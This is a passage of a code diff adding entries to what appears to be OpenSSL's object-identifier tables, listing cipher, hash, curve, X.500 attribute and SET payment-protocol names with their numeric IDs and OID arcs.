+412,	/* "prime239v1" */
+413,	/* "prime239v2" */
+414,	/* "prime239v3" */
+415,	/* "prime256v1" */
+886,	/* "protocolInformation" */
+510,	/* "pseudonym" */
+435,	/* "pss" */
+286,	/* "qcStatements" */
+457,	/* "qualityLabelledData" */
+450,	/* "rFC822localPart" */
+98,	/* "rc2-40-cbc" */
+166,	/* "rc2-64-cbc" */
+37,	/* "rc2-cbc" */
+39,	/* "rc2-cfb" */
+38,	/* "rc2-ecb" */
+40,	/* "rc2-ofb" */
+ 5,	/* "rc4" */
+97,	/* "rc4-40" */
+915,	/* "rc4-hmac-md5" */
+120,	/* "rc5-cbc" */
+122,	/* "rc5-cfb" */
+121,	/* "rc5-ecb" */
+123,	/* "rc5-ofb" */
+870,	/* "registeredAddress" */
+460,	/* "rfc822Mailbox" */
+117,	/* "ripemd160" */
+119,	/* "ripemd160WithRSA" */
+400,	/* "role" */
+877,	/* "roleOccupant" */
+448,	/* "room" */
+463,	/* "roomNumber" */
+19,	/* "rsa" */
+ 6,	/* "rsaEncryption" */
+644,	/* "rsaOAEPEncryptionSET" */
+377,	/* "rsaSignature" */
+919,	/* "rsaesOaep" */
+912,	/* "rsassaPss" */
+124,	/* "run length compression" */
+482,	/* "sOARecord" */
+155,	/* "safeContentsBag" */
+291,	/* "sbgp-autonomousSysNum" */
+290,	/* "sbgp-ipAddrBlock" */
+292,	/* "sbgp-routerIdentifier" */
+159,	/* "sdsiCertificate" */
+859,	/* "searchGuide" */
+704,	/* "secp112r1" */
+705,	/* "secp112r2" */
+706,	/* "secp128r1" */
+707,	/* "secp128r2" */
+708,	/* "secp160k1" */
+709,	/* "secp160r1" */
+710,	/* "secp160r2" */
+711,	/* "secp192k1" */
+712,	/* "secp224k1" */
+713,	/* "secp224r1" */
+714,	/* "secp256k1" */
+715,	/* "secp384r1" */
+716,	/* "secp521r1" */
+154,	/* "secretBag" */
+474,	/* "secretary" */
+717,	/* "sect113r1" */
+718,	/* "sect113r2" */
+719,	/* "sect131r1" */
+720,	/* "sect131r2" */
+721,	/* "sect163k1" */
+722,	/* "sect163r1" */
+723,	/* "sect163r2" */
+724,	/* "sect193r1" */
+725,	/* "sect193r2" */
+726,	/* "sect233k1" */
+727,	/* "sect233r1" */
+728,	/* "sect239k1" */
+729,	/* "sect283k1" */
+730,	/* "sect283r1" */
+731,	/* "sect409k1" */
+732,	/* "sect409r1" */
+733,	/* "sect571k1" */
+734,	/* "sect571r1" */
+635,	/* "secure device signature" */
+878,	/* "seeAlso" */
+777,	/* "seed-cbc" */
+779,	/* "seed-cfb" */
+776,	/* "seed-ecb" */
+778,	/* "seed-ofb" */
+105,	/* "serialNumber" */
+625,	/* "set-addPolicy" */
+515,	/* "set-attr" */
+518,	/* "set-brand" */
+638,	/* "set-brand-AmericanExpress" */
+637,	/* "set-brand-Diners" */
+636,	/* "set-brand-IATA-ATA" */
+639,	/* "set-brand-JCB" */
+641,	/* "set-brand-MasterCard" */
+642,	/* "set-brand-Novus" */
+640,	/* "set-brand-Visa" */
+516,	/* "set-policy" */
+607,	/* "set-policy-root" */
+624,	/* "set-rootKeyThumb" */
+620,	/* "setAttr-Cert" */
+628,	/* "setAttr-IssCap-CVM" */
+630,	/* "setAttr-IssCap-Sig" */
+629,	/* "setAttr-IssCap-T2" */
+627,	/* "setAttr-Token-B0Prime" */
+626,	/* "setAttr-Token-EMV" */
+622,	/* "setAttr-TokenType" */
+619,	/* "setCext-IssuerCapabilities" */
+615,	/* "setCext-PGWYcapabilities" */
+616,	/* "setCext-TokenIdentifier" */
+618,	/* "setCext-TokenType" */
+617,	/* "setCext-Track2Data" */
+611,	/* "setCext-cCertRequired" */
+609,	/* "setCext-certType" */
+608,	/* "setCext-hashedRoot" */
+610,	/* "setCext-merchData" */
+613,	/* "setCext-setExt" */
+614,	/* "setCext-setQualf" */
+612,	/* "setCext-tunneling" */
+540,	/* "setct-AcqCardCodeMsg" */
+576,	/* "setct-AcqCardCodeMsgTBE" */
+570,	/* "setct-AuthReqTBE" */
+534,	/* "setct-AuthReqTBS" */
+527,	/* "setct-AuthResBaggage" */
+571,	/* "setct-AuthResTBE" */
+572,	/* "setct-AuthResTBEX" */
+535,	/* "setct-AuthResTBS" */
+536,	/* "setct-AuthResTBSX" */
+528,	/* "setct-AuthRevReqBaggage" */
+577,	/* "setct-AuthRevReqTBE" */
+541,	/* "setct-AuthRevReqTBS" */
+529,	/* "setct-AuthRevResBaggage" */
+542,	/* "setct-AuthRevResData" */
+578,	/* "setct-AuthRevResTBE" */
+579,	/* "setct-AuthRevResTBEB" */
+543,	/* "setct-AuthRevResTBS" */
+573,	/* "setct-AuthTokenTBE" */
+537,	/* "setct-AuthTokenTBS" */
+600,	/* "setct-BCIDistributionTBS" */
+558,	/* "setct-BatchAdminReqData" */
+592,	/* "setct-BatchAdminReqTBE" */
+559,	/* "setct-BatchAdminResData" */
+593,	/* "setct-BatchAdminResTBE" */
+599,	/* "setct-CRLNotificationResTBS" */
+598,	/* "setct-CRLNotificationTBS" */
+580,	/* "setct-CapReqTBE" */
+581,	/* "setct-CapReqTBEX" */
+544,	/* "setct-CapReqTBS" */
+545,	/* "setct-CapReqTBSX" */
+546,	/* "setct-CapResData" */
+582,	/* "setct-CapResTBE" */
+583,	/* "setct-CapRevReqTBE" */
+584,	/* "setct-CapRevReqTBEX" */
+547,	/* "setct-CapRevReqTBS" */
+548,	/* "setct-CapRevReqTBSX" */
+549,	/* "setct-CapRevResData" */
+585,	/* "setct-CapRevResTBE" */
+538,	/* "setct-CapTokenData" */
+530,	/* "setct-CapTokenSeq" */
+574,	/* "setct-CapTokenTBE" */
+575,	/* "setct-CapTokenTBEX" */
+539,	/* "setct-CapTokenTBS" */
+560,	/* "setct-CardCInitResTBS" */
+566,	/* "setct-CertInqReqTBS" */
+563,	/* "setct-CertReqData" */
+595,	/* "setct-CertReqTBE" */
+596,	/* "setct-CertReqTBEX" */
+564,	/* "setct-CertReqTBS" */
+565,	/* "setct-CertResData" */
+597,	/* "setct-CertResTBE" */
+586,	/* "setct-CredReqTBE" */
+587,	/* "setct-CredReqTBEX" */
+550,	/* "setct-CredReqTBS" */
+551,	/* "setct-CredReqTBSX" */
+552,	/* "setct-CredResData" */
+588,	/* "setct-CredResTBE" */
+589,	/* "setct-CredRevReqTBE" */
+590,	/* "setct-CredRevReqTBEX" */
+553,	/* "setct-CredRevReqTBS" */
+554,	/* "setct-CredRevReqTBSX" */
+555,	/* "setct-CredRevResData" */
+591,	/* "setct-CredRevResTBE" */
+567,	/* "setct-ErrorTBS" */
+526,	/* "setct-HODInput" */
+561,	/* "setct-MeAqCInitResTBS" */
+522,	/* "setct-OIData" */
+519,	/* "setct-PANData" */
+521,	/* "setct-PANOnly" */
+520,	/* "setct-PANToken" */
+556,	/* "setct-PCertReqData" */
+557,	/* "setct-PCertResTBS" */
+523,	/* "setct-PI" */
+532,	/* "setct-PI-TBS" */
+524,	/* "setct-PIData" */
+525,	/* "setct-PIDataUnsigned" */
+568,	/* "setct-PIDualSignedTBE" */
+569,	/* "setct-PIUnsignedTBE" */
+531,	/* "setct-PInitResData" */
+533,	/* "setct-PResData" */
+594,	/* "setct-RegFormReqTBE" */
+562,	/* "setct-RegFormResTBS" */
+604,	/* "setext-pinAny" */
+603,	/* "setext-pinSecure" */
+605,	/* "setext-track2" */
+41,	/* "sha" */
+64,	/* "sha1" */
+115,	/* "sha1WithRSA" */
+65,	/* "sha1WithRSAEncryption" */
+675,	/* "sha224" */
+671,	/* "sha224WithRSAEncryption" */
+672,	/* "sha256" */
+668,	/* "sha256WithRSAEncryption" */
+673,	/* "sha384" */
+669,	/* "sha384WithRSAEncryption" */
+674,	/* "sha512" */
+670,	/* "sha512WithRSAEncryption" */
+42,	/* "shaWithRSAEncryption" */
+52,	/* "signingTime" */
+454,	/* "simpleSecurityObject" */
+496,	/* "singleLevelQuality" */
+16,	/* "stateOrProvinceName" */
+660,	/* "streetAddress" */
+498,	/* "subtreeMaximumQuality" */
+497,	/* "subtreeMinimumQuality" */
+890,	/* "supportedAlgorithms" */
+874,	/* "supportedApplicationContext" */
+100,	/* "surname" */
+864,	/* "telephoneNumber" */
+866,	/* "teletexTerminalIdentifier" */
+865,	/* "telexNumber" */
+459,	/* "textEncodedORAddress" */
+293,	/* "textNotice" */
+106,	/* "title" */
+682,	/* "tpBasis" */
+436,	/* "ucl" */
+ 0,	/* "undefined" */
+888,	/* "uniqueMember" */
+55,	/* "unstructuredAddress" */
+49,	/* "unstructuredName" */
+880,	/* "userCertificate" */
+465,	/* "userClass" */
+458,	/* "userId" */
+879,	/* "userPassword" */
+373,	/* "valid" */
+678,	/* "wap" */
+679,	/* "wap-wsg" */
+735,	/* "wap-wsg-idm-ecid-wtls1" */
+743,	/* "wap-wsg-idm-ecid-wtls10" */
+744,	/* "wap-wsg-idm-ecid-wtls11" */
+745,	/* "wap-wsg-idm-ecid-wtls12" */
+736,	/* "wap-wsg-idm-ecid-wtls3" */
+737,	/* "wap-wsg-idm-ecid-wtls4" */
+738,	/* "wap-wsg-idm-ecid-wtls5" */
+739,	/* "wap-wsg-idm-ecid-wtls6" */
+740,	/* "wap-wsg-idm-ecid-wtls7" */
+741,	/* "wap-wsg-idm-ecid-wtls8" */
+742,	/* "wap-wsg-idm-ecid-wtls9" */
+804,	/* "whirlpool" */
+868,	/* "x121Address" */
+503,	/* "x500UniqueIdentifier" */
+158,	/* "x509Certificate" */
+160,	/* "x509Crl" */
+125,	/* "zlib compression" */
+};
+
+static const unsigned int obj_objs[NUM_OBJ]={
+ 0,	/* OBJ_undef                        0 */
+181,	/* OBJ_iso                          1 */
+393,	/* OBJ_joint_iso_ccitt              OBJ_joint_iso_itu_t */
+404,	/* OBJ_ccitt                        OBJ_itu_t */
+645,	/* OBJ_itu_t                        0 */
+646,	/* OBJ_joint_iso_itu_t              2 */
+434,	/* OBJ_data                         0 9 */
+182,	/* OBJ_member_body                  1 2 */
+379,	/* OBJ_org                          1 3 */
+676,	/* OBJ_identified_organization      1 3 */
+11,	/* OBJ_X500                         2 5 */
+647,	/* OBJ_international_organizations  2 23 */
+380,	/* OBJ_dod                          1 3 6 */
+12,	/* OBJ_X509                         2 5 4 */
+378,	/* OBJ_X500algorithms               2 5 8 */
+81,	/* OBJ_id_ce                        2 5 29 */
+512,	/* OBJ_id_set                       2 23 42 */
+678,	/* OBJ_wap                          2 23 43 */
+435,	/* OBJ_pss                          0 9 2342 */
+183,	/* OBJ_ISO_US                       1 2 840 */
+381,	/* OBJ_iana                         1 3 6 1 */
+677,	/* OBJ_certicom_arc                 1 3 132 */
+394,	/* OBJ_selected_attribute_types     2 5 1 5 */
+13,	/* OBJ_commonName                   2 5 4 3 */
+100,	/* OBJ_surname                      2 5 4 4 */
+105,	/* OBJ_serialNumber                 2 5 4 5 */
+14,	/* OBJ_countryName                  2 5 4 6 */
+15,	/* OBJ_localityName                 2 5 4 7 */
+16,	/* OBJ_stateOrProvinceName          2 5 4 8 */
+660,	/* OBJ_streetAddress                2 5 4 9 */
+17,	/* OBJ_organizationName             2 5 4 10 */
+18,	/* OBJ_organizationalUnitName       2 5 4 11 */
+106,	/* OBJ_title                        2 5 4 12 */
+107,	/* OBJ_description                  2 5 4 13 */
+859,	/* OBJ_searchGuide                  2 5 4 14 */
+860,	/* OBJ_businessCategory             2 5 4 15 */
+861,	/* OBJ_postalAddress                2 5 4 16 */
+661,	/* OBJ_postalCode                   2 5 4 17 */
+862,	/* OBJ_postOfficeBox                2 5 4 18 */
+863,	/* OBJ_physicalDeliveryOfficeName   2 5 4 19 */
+864,	/* OBJ_telephoneNumber              2 5 4 20 */
+865,	/* OBJ_telexNumber                  2 5 4 21 */
+866,	/* OBJ_teletexTerminalIdentifier    2 5 4 22 */
+867,	/* OBJ_facsimileTelephoneNumber     2 5 4 23 */
+868,	/* OBJ_x121Address                  2 5 4 24 */
+869,	/* OBJ_internationaliSDNNumber      2 5 4 25 */
+870,	/* OBJ_registeredAddress            2 5 4 26 */
+871,	/* OBJ_destinationIndicator         2 5 4 27 */
+872,	/* OBJ_preferredDeliveryMethod      2 5 4 28 */
+873,	/* OBJ_presentationAddress          2 5 4 29 */
+874,	/* OBJ_supportedApplicationContext  2 5 4 30 */
+875,	/* OBJ_member                       2 5 4 31 */
+876,	/* OBJ_owner                        2 5 4 32 */
+877,	/* OBJ_roleOccupant                 2 5 4 33 */
+878,	/* OBJ_seeAlso                      2 5 4 34 */
+879,	/* OBJ_userPassword                 2 5 4 35 */
+880,	/* OBJ_userCertificate              2 5 4 36 */
+881,	/* OBJ_cACertificate                2 5 4 37 */
+882,	/* OBJ_authorityRevocationList      2 5 4 38 */
+883,	/* OBJ_certificateRevocationList    2 5 4 39 */
+884,	/* OBJ_crossCertificatePair         2 5 4 40 */
+173,	/* OBJ_name                         2 5 4 41 */
+99,	/* OBJ_givenName                    2 5 4 42 */
+101,	/* OBJ_initials                     2 5 4 43 */
+509,	/* OBJ_generationQualifier          2 5 4 44 */
+503,	/* OBJ_x500UniqueIdentifier         2 5 4 45 */
+174,	/* OBJ_dnQualifier                  2 5 4 46 */
+885,	/* OBJ_enhancedSearchGuide          2 5 4 47 */
+886,	/* OBJ_protocolInformation          2 5 4 48 */
+887,	/* OBJ_distinguishedName            2 5 4 49 */
+888,	/* OBJ_uniqueMember                 2 5 4 50 */
+889,	/* OBJ_houseIdentifier              2 5 4 51 */
+890,	/* OBJ_supportedAlgorithms          2 5 4 52 */
+891,	/* OBJ_deltaRevocationList          2 5 4 53 */
+892,	/* OBJ_dmdName                      2 5 4 54 */
+510,	/* OBJ_pseudonym                    2 5 4 65 */
+400,	/* OBJ_role                         2 5 4 72 */
+769,	/* OBJ_subject_directory_attributes 2 5 29 9 */
+82,	/* OBJ_subject_key_identifier       2 5 29 14 */
+83,	/* OBJ_key_usage                    2 5 29 15 */
+84,	/* OBJ_private_key_usage_period     2 5 29 16 */
+85,	/* OBJ_subject_alt_name             2 5 29 17 */
+86,	/* OBJ_issuer_alt_name              2 5 29 18 */
+87,	/* OBJ_basic_constraints            2 5 29 19 */
+88,	/* OBJ_crl_number                   2 5 29 20 */
+141,	/* OBJ_crl_reason                   2 5 29 21 */
+430,	/* OBJ_hold_instruction_code        2 5 29 23 */
+142,	/* OBJ_invalidity_date              2 5 29 24 */
+140,	/* OBJ_delta_crl                    2 5 29 27 */
+770,	/* OBJ_issuing_distribution_point   2 5 29 28 */
+771,	/* OBJ_certificate_issuer           2 5 29 29 */
+666,	/* OBJ_name_constraints             2 5 29 30 */
+103,	/* OBJ_crl_distribution_points      2 5 29 31 */
+89,	/* OBJ_certificate_policies         2 5 29 32 */
+747,	/* OBJ_policy_mappings              2 5 29 33 */
+90,	/* OBJ_authority_key_identifier     2 5 29 35 */
+401,	/* OBJ_policy_constraints           2 5 29 36 */
+126,	/* OBJ_ext_key_usage                2 5 29 37 */
+857,	/* OBJ_freshest_crl                 2 5 29 46 */
+748,	/* OBJ_inhibit_any_policy           2 5 29 54 */
+402,	/* OBJ_target_information           2 5 29 55 */
+403,	/* OBJ_no_rev_avail                 2 5 29 56 */
+513,	/* OBJ_set_ctype                    2 23 42 0 */
+514,	/* OBJ_set_msgExt                   2 23 42 1 */
+515,	/* OBJ_set_attr                     2 23 42 3 */
+516,	/* OBJ_set_policy                   2 23 42 5 */
+517,	/* OBJ_set_certExt                  2 23 42 7 */
+518,	/* OBJ_set_brand                    2 23 42 8 */
+679,	/* OBJ_wap_wsg                      2 23 43 1 */
+382,	/* OBJ_Directory                    1 3 6 1 1 */
+383,	/* OBJ_Management                   1 3 6 1 2 */
+384,	/* OBJ_Experimental                 1 3 6 1 3 */
+385,	/* OBJ_Private                      1 3 6 1 4 */
+386,	/* OBJ_Security                     1 3 6 1 5 */
+387,	/* OBJ_SNMPv2                       1 3 6 1 6 */
+388,	/* OBJ_Mail                         1 3 6 1 7 */
+376,	/* OBJ_algorithm                    1 3 14 3 2 */
+395,	/* OBJ_clearance                    2 5 1 5 55 */
+19,	/* OBJ_rsa                          2 5 8 1 1 */
+96,	/* OBJ_mdc2WithRSA                  2 5 8 3 100 */
+95,	/* OBJ_mdc2                         2 5 8 3 101 */
+746,	/* OBJ_any_policy                   2 5 29 32 0 */
+910,	/* OBJ_anyExtendedKeyUsage          2 5 29 37 0 */
+519,	/* OBJ_setct_PANData                2 23 42 0 0 */
+520,	/* OBJ_setct_PANToken               2 23 42 0 1 */
+521,	/* OBJ_setct_PANOnly                2 23 42 0 2 */
+522,	/* OBJ_setct_OIData                 2 23 42 0 3 */
+523,	/* OBJ_setct_PI                     2 23 42 0 4 */
+524,	/* OBJ_setct_PIData                 2 23 42 0 5 */
+525,	/* OBJ_setct_PIDataUnsigned         2 23 42 0 6 */
+526,	/* OBJ_setct_HODInput               2 23 42 0 7 */
+527,	/* OBJ_setct_AuthResBaggage         2 23 42 0 8 */
+528,	/* OBJ_setct_AuthRevReqBaggage      2 23 42 0 9 */
+529,	/* OBJ_setct_AuthRevResBaggage      2 23 42 0 10 */
+530,	/* OBJ_setct_CapTokenSeq            2 23 42 0 11 */
+531,	/* OBJ_setct_PInitResData           2 23 42 0 12 */
+532,	/* OBJ_setct_PI_TBS                 2 23 42 0 13 */
+533,	/* OBJ_setct_PResData               2 23 42 0 14 */
+534,	/* OBJ_setct_AuthReqTBS             2 23 42 0 16 */
+535,	/* OBJ_setct_AuthResTBS             2 23 42 0 17 */
+536,	/* OBJ_setct_AuthResTBSX            2 23 42 0 18 */
+537,	/* OBJ_setct_AuthTokenTBS           2 23 42 0 19 */
+538,	/* OBJ_setct_CapTokenData           2 23 42 0 20 */
+539,	/* OBJ_setct_CapTokenTBS            2 23 42 0 21 */
+540,	/* OBJ_setct_AcqCardCodeMsg         2 23 42 0 22 */
+541,	/* OBJ_setct_AuthRevReqTBS          2 23 42 0 23 */
+542,	/* OBJ_setct_AuthRevResData         2 23 42 0 24 */
+543,	/* OBJ_setct_AuthRevResTBS          2 23 42 0 25 */
+544,	/* OBJ_setct_CapReqTBS              2 23 42 0 26 */
+545,	/* OBJ_setct_CapReqTBSX             2 23 42 0 27 */
+546,	/* OBJ_setct_CapResData             2 23 42 0 28 */
+547,	/* OBJ_setct_CapRevReqTBS           2 23 42 0 29 */
+548,	/* OBJ_setct_CapRevReqTBSX          2 23 42 0 30 */
+549,	/* OBJ_setct_CapRevResData          2 23 42 0 31 */
+550,	/* OBJ_setct_CredReqTBS             2 23 42 0 32 */
+551,	/* OBJ_setct_CredReqTBSX            2 23 42 0 33 */
+552,	/* OBJ_setct_CredResData            2 23 42 0 34 */
+553,	/* OBJ_setct_CredRevReqTBS          2 23 42 0 35 */
+554,	/* OBJ_setct_CredRevReqTBSX         2 23 42 0 36 */
+555,	/* OBJ_setct_CredRevResData         2 23 42 0 37 */
+556,	/* OBJ_setct_PCertReqData           2 23 42 0 38 */
+557,	/* OBJ_setct_PCertResTBS            2 23 42 0 39 */
+558,	/* OBJ_setct_BatchAdminReqData      2 23 42 0 40 */
+559,	/* OBJ_setct_BatchAdminResData      2 23 42 0 41 */
+560,	/* OBJ_setct_CardCInitResTBS        2 23 42 0 42 */
+561,	/* OBJ_setct_MeAqCInitResTBS        2 23 42 0 43 */
+562,	/* OBJ_setct_RegFormResTBS          2 23 42 0 44 */
+563,	/* OBJ_setct_CertReqData            2 23 42 0 45 */
+564,	/* OBJ_setct_CertReqTBS             2 23 42 0 46 */
+565,	/* OBJ_setct_CertResData            2 23 42 0 47 */
+566,	/* OBJ_setct_CertInqReqTBS          2 23 42 0 48 */
+567,	/* OBJ_setct_ErrorTBS               2 23 42 0 49 */
+568,	/* OBJ_setct_PIDualSignedTBE        2 23 42 0 50 */
+569,	/* OBJ_setct_PIUnsignedTBE          2 23 42 0 51 */
+570,	/* OBJ_setct_AuthReqTBE             2 23 42 0 52 */
+571,	/* OBJ_setct_AuthResTBE             2 23 42 0 53 */
+572,	/* OBJ_setct_AuthResTBEX            2 23 42 0 54 */
+573,	/* OBJ_setct_AuthTokenTBE           2 23 42 0 55 */
+574,	/* OBJ_setct_CapTokenTBE            2 23 42 0 56 */
+575,	/* OBJ_setct_CapTokenTBEX           2 23 42 0 57 */
+576,	/* OBJ_setct_AcqCardCodeMsgTBE      2 23 42 0 58 */
+577,	/* OBJ_setct_AuthRevReqTBE          2 23 42 0 59 */
+578,	/* OBJ_setct_AuthRevResTBE          2 23 42 0 60 */
+579,	/* OBJ_setct_AuthRevResTBEB         2 23 42 0 61 */
+580,	/* OBJ_setct_CapReqTBE              2 23 42 0 62 */
+581,	/* OBJ_setct_CapReqTBEX             2 23 42 0 63 */
+582,	/* OBJ_setct_CapResTBE              2 23 42 0 64 */
+583,	/* OBJ_setct_CapRevReqTBE           2 23 42 0 65 */
+584,	/* OBJ_setct_CapRevReqTBEX          2 23 42 0 66 */
+585,	/* OBJ_setct_CapRevResTBE           2 23 42 0 67 */
+586,	/* OBJ_setct_CredReqTBE             2 23 42 0 68 */
+587,	/* OBJ_setct_CredReqTBEX            2 23 42 0 69 */
+588,	/* OBJ_setct_CredResTBE             2 23 42 0 70 */
+589,	/* OBJ_setct_CredRevReqTBE          2 23 42 0 71 */
+590,	/* OBJ_setct_CredRevReqTBEX         2 23 42 0 72 */
+591,	/* OBJ_setct_CredRevResTBE          2 23 42 0 73 */
+592,	/* OBJ_setct_BatchAdminReqTBE       2 23 42 0 74 */
+593,	/* OBJ_setct_BatchAdminResTBE       2 23 42 0 75 */
+594,	/* OBJ_setct_RegFormReqTBE          2 23 42 0 76 */
+595,	/* OBJ_setct_CertReqTBE             2 23 42 0 77 */
+596,	/* OBJ_setct_CertReqTBEX            2 23 42 0 78 */
+597,	/* OBJ_setct_CertResTBE             2 23 42 0 79 */
+598,	/* OBJ_setct_CRLNotificationTBS     2 23 42 0 80 */
+599,	/* OBJ_setct_CRLNotificationResTBS  2 23 42 0 81 */
+600,	/* OBJ_setct_BCIDistributionTBS     2 23 42 0 82 */
+601,	/* OBJ_setext_genCrypt              2 23 42 1 1 */
+602,	/* OBJ_setext_miAuth                2 23 42 1 3 */
+603,	/* OBJ_setext_pinSecure             2 23 42 1 4 */
+604,	/* OBJ_setext_pinAny                2 23 42 1 5 */
+605,	/* OBJ_setext_track2                2 23 42 1 7 */
+606,	/* OBJ_setext_cv                    2 23 42 1 8 */
+620,	/* OBJ_setAttr_Cert                 2 23 42 3 0 */
+621,	/* OBJ_setAttr_PGWYcap              2 23 42 3 1 */
+622,	/* OBJ_setAttr_TokenType            2 23 42 3 2 */
+623,	/* OBJ_setAttr_IssCap               2 23 42 3 3 */
+607,	/* OBJ_set_policy_root              2 23 42 5 0 */
+608,	/* OBJ_setCext_hashedRoot           2 23 42 7 0 */
+609,	/* OBJ_setCext_certType             2 23 42 7 1 */
+610,	/* OBJ_setCext_merchData            2 23 42 7 2 */
+611,	/* OBJ_setCext_cCertRequired        2 23 42 7 3 */
+612,	/* OBJ_setCext_tunneling            2 23 42 7 4 */
+613,	/* OBJ_setCext_setExt               2 23 42 7 5 */
+614,	/* OBJ_setCext_setQualf             2 23 42 7 6 */
+615,	/* OBJ_setCext_PGWYcapabilities     2 23 42 7 7 */
+616,	/* OBJ_setCext_TokenIdentifier      2 23 42 7 8 */
+617,	/* OBJ_setCext_Track2Data           2 23 42 7 9 */
+618,	/* OBJ_setCext_TokenType            2 23 42 7 10 */
+619,	/* OBJ_setCext_IssuerCapabilities   2 23 42 7 11 */
+636,	/* OBJ_set_brand_IATA_ATA           2 23 42 8 1 */
+640,	/* OBJ_set_brand_Visa               2 23 42 8 4 */
+641,	/* OBJ_set_brand_MasterCard         2 23 42 8 5 */
+637,	/* OBJ_set_brand_Diners             2 23 42 8 30 */
+638,	/* OBJ_set_brand_AmericanExpress    2 23 42 8 34 */
+639,	/* OBJ_set_brand_JCB                2 23 42 8 35 */
+805,	/* OBJ_cryptopro                    1 2 643 2 2 */
+806,	/* OBJ_cryptocom                    1 2 643 2 9 */
+184,	/* OBJ_X9_57                        1 2 840 10040 */
+405,	/* OBJ_ansi_X9_62                   1 2 840 10045 */
+389,	/* OBJ_Enterprises                  1 3 6 1 4 1 */
+504,	/* OBJ_mime_mhs                     1 3 6 1 7 1 */
+104,	/* OBJ_md5WithRSA                   1 3 14 3 2 3 */
+29,	/* OBJ_des_ecb                      1 3 14 3 2 6 */
+31,	/* OBJ_des_cbc                      1 3 14 3 2 7 */
+45,	/* OBJ_des_ofb64                    1 3 14 3 2 8 */
+30,	/* OBJ_des_cfb64                    1 3 14 3 2 9 */
+377,	/* OBJ_rsaSignature                 1 3 14 3 2 11 */
+67,	/* OBJ_dsa_2                        1 3 14 3 2 12 */
+66,	/* OBJ_dsaWithSHA                   1 3 14 3 2 13 */
+42,	/* OBJ_shaWithRSAEncryption         1 3 14 3 2 15 */
+32,	/* OBJ_des_ede_ecb                  1 3 14 3 2 17 */
+41,	/* OBJ_sha                          1 3 14 3 2 18 */
+64,	/* OBJ_sha1                         1 3 14 3 2 26 */
+70,	/* OBJ_dsaWithSHA1_2                1 3 14 3 2 27 */
+115,	/* OBJ_sha1WithRSA                  1 3 14 3 2 29 */
+117,	/* OBJ_ripemd160                    1 3 36 3 2 1 */
+143,	/* OBJ_sxnet                        1 3 101 1 4 1 */
+721,	/* OBJ_sect163k1                    1 3 132 0 1 */
+722,	/* OBJ_sect163r1                    1 3 132 0 2 */
+728,	/* OBJ_sect239k1                    1 3 132 0 3 */
+717,	/* OBJ_sect113r1                    1 3 132 0 4 */
+718,	/* OBJ_sect113r2                    1 3 132 0 5 */
+704,	/* OBJ_secp112r1                    1 3 132 0 6 */
+705,	/* OBJ_secp112r2                    1 3 132 0 7 */
+709,	/* OBJ_secp160r1                    1 3 132 0 8 */
+708,	/* OBJ_secp160k1                    1 3 132 0 9 */
+714,	/* OBJ_secp256k1                    1 3 132 0 10 */
+723,	/* OBJ_sect163r2                    1 3 132 0 15 */
+729,	/* OBJ_sect283k1                    1 3 132 0 16 */
+730,	/* OBJ_sect283r1                    1 3 132 0 17 */
+719,	/* OBJ_sect131r1                    1 3 132 0 22 */
+720,	/* OBJ_sect131r2                    1 3 132 0 23 */
+724,	/* OBJ_sect193r1                    1 3 132 0 24 */
+725,	/* OBJ_sect193r2                    1 3 132 0 25 */
+726,	/* OBJ_sect233k1                    1 3 132 0 26 */
+727,	/* OBJ_sect233r1                    1 3 132 0 27 */
+706,	/* OBJ_secp128r1                    1 3 132 0 28 */
+707,	/* OBJ_secp128r2                    1 3 132 0 29 */
+710,	/* OBJ_secp160r2                    1 3 132 0 30 */
+711,	/* OBJ_secp192k1                    1 3 132 0 31 */
+712,	/* OBJ_secp224k1                    1 3 132 0 32 */
+713,	/* OBJ_secp224r1                    1 3 132 0 33 */
+715,	/* OBJ_secp384r1                    1 3 132 0 34 */
+716,	/* OBJ_secp521r1                    1 3 132 0 35 */
+731,	/* OBJ_sect409k1                    1 3 132 0 36 */
+732,	/* OBJ_sect409r1                    1 3 132 0 37 */
+733,	/* OBJ_sect571k1                    1 3 132 0 38 */
+734,	/* OBJ_sect571r1                    1 3 132 0 39 */
+624,	/* OBJ_set_rootKeyThumb             2 23 42 3 0 0 */
+625,	/* OBJ_set_addPolicy                2 23 42 3 0 1 */
+626,	/* OBJ_setAttr_Token_EMV            2 23 42 3 2 1 */
+627,	/* OBJ_setAttr_Token_B0Prime        2 23 42 3 2 2 */
+628,	/* OBJ_setAttr_IssCap_CVM           2 23 42 3 3 3 */
+629,	/* OBJ_setAttr_IssCap_T2            2 23 42 3 3 4 */
+630,	/* OBJ_setAttr_IssCap_Sig           2 23 42 3 3 5 */
+642,	/* OBJ_set_brand_Novus              2 23 42 8 6011 */
+735,	/* OBJ_wap_wsg_idm_ecid_wtls1       2 23 43 1 4 1 */
+736,	/* OBJ_wap_wsg_idm_ecid_wtls3       2 23 43 1 4 3 */
+737,	/* OBJ_wap_wsg_idm_ecid_wtls4       2 23 43 1 4 4 */
+738,	/* OBJ_wap_wsg_idm_ecid_wtls5       2 23 43 1 4 5 */
+739,	/* OBJ_wap_wsg_idm_ecid_wtls6       2 23 43 1 4 6 */
+740,	/* OBJ_wap_wsg_idm_ecid_wtls7       2 23 43 1 4 7 */
+741,	/* OBJ_wap_wsg_idm_ecid_wtls8       2 23 43 1 4 8 */
+742,	/* OBJ_wap_wsg_idm_ecid_wtls9       2 23 43 1 4 9 */
+743,	/* OBJ_wap_wsg_idm_ecid_wtls10      2 23 43 1 4 10 */
+744,	/* OBJ_wap_wsg_idm_ecid_wtls11      2 23 43 1 4 11 */
+745,	/* OBJ_wap_wsg_idm_ecid_wtls12      2 23 43 1 4 12 */
+804,	/* OBJ_whirlpool                    1 0 10118 3 0 55 */
+124,	/* OBJ_rle_compression              1 1 1 1 666 1 */
+773,	/* OBJ_kisa                         1 2 410 200004 */
+807,	/* OBJ_id_GostR3411_94_with_GostR3410_2001 1 2 643 2 2 3 */
+808,	/* OBJ_id_GostR3411_94_with_GostR3410_94 1 2 643 2 2 4 */
+809,	/* OBJ_id_GostR3411_94              1 2 643 2 2 9 */
+810,	/* OBJ_id_HMACGostR3411_94          1 2 643 2 2 10 */
+811,	/* OBJ_id_GostR3410_2001            1 2 643 2 2 19 */
+812,	/* OBJ_id_GostR3410_94              1 2 643 2 2 20 */
+813,	/* OBJ_id_Gost28147_89              1 2 643 2 2 21 */
+815,	/* OBJ_id_Gost28147_89_MAC          1 2 643 2 2 22 */
+816,	/* OBJ_id_GostR3411_94_prf          1 2 643 2 2 23 */
+817,	/* OBJ_id_GostR3410_2001DH          1 2 643 2 2 98 */
+818,	/* OBJ_id_GostR3410_94DH            1 2 643 2 2 99 */
